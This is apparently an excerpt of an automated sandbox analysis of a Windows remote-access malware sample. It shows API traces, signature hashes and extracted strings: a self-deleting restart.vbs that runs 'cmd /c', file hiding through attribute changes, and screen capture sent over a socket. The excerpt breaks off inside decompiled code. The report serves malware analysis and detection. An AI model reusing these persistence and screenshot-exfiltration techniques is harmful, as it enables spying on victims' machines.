                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                  • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                  • API String ID: 2510920776-3166941866
                                  • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                  • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                  • _wgetenv.MSVCRT ref: 0041366D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                  • _wgetenv.MSVCRT ref: 004136CE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                  • _wgetenv.MSVCRT ref: 00413720
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                  • GetLongPathNameW.KERNEL32 ref: 00413748
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                  • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 1999370131-1609423294
                                  • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                  • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                    • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                  • _wgetenv.MSVCRT ref: 00408A1B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                  • exit.MSVCRT ref: 00408B3D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                  • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                  • API String ID: 864010295-1332127163
                                  • Opcode ID: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                  • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                  • Opcode Fuzzy Hash: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                  • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 00405607
                                    • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                    • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                    • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                    • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                    • Part of subcall function 00405532: CloseHandle.KERNEL32(00000000), ref: 004055AE
                                    • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 3042614570-0
                                  • Opcode ID: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                  • Opcode Fuzzy Hash: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                  • _itoa.MSVCRT ref: 0040F75C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                    • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$D@1@@$?size@?$basic_string@CreateG@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                  • String ID: image/jpeg
                                  • API String ID: 2742309606-3785015651
                                  • Opcode ID: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                  • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                  • Opcode Fuzzy Hash: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                  • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E004059BE(intOrPtr __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				char _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				void* _v92;
                                  				intOrPtr _t41;
                                  				int _t43;
                                  				CHAR* _t45;
                                  				signed int _t48;
                                  				char* _t58;
                                  				char* _t59;
                                  				struct HWND__* _t93;
                                  				intOrPtr _t94;
                                  				void* _t99;
                                  				intOrPtr _t112;
                                  
                                  				_v12 = __ecx;
                                  				while(1) {
                                  					_t41 = _v12;
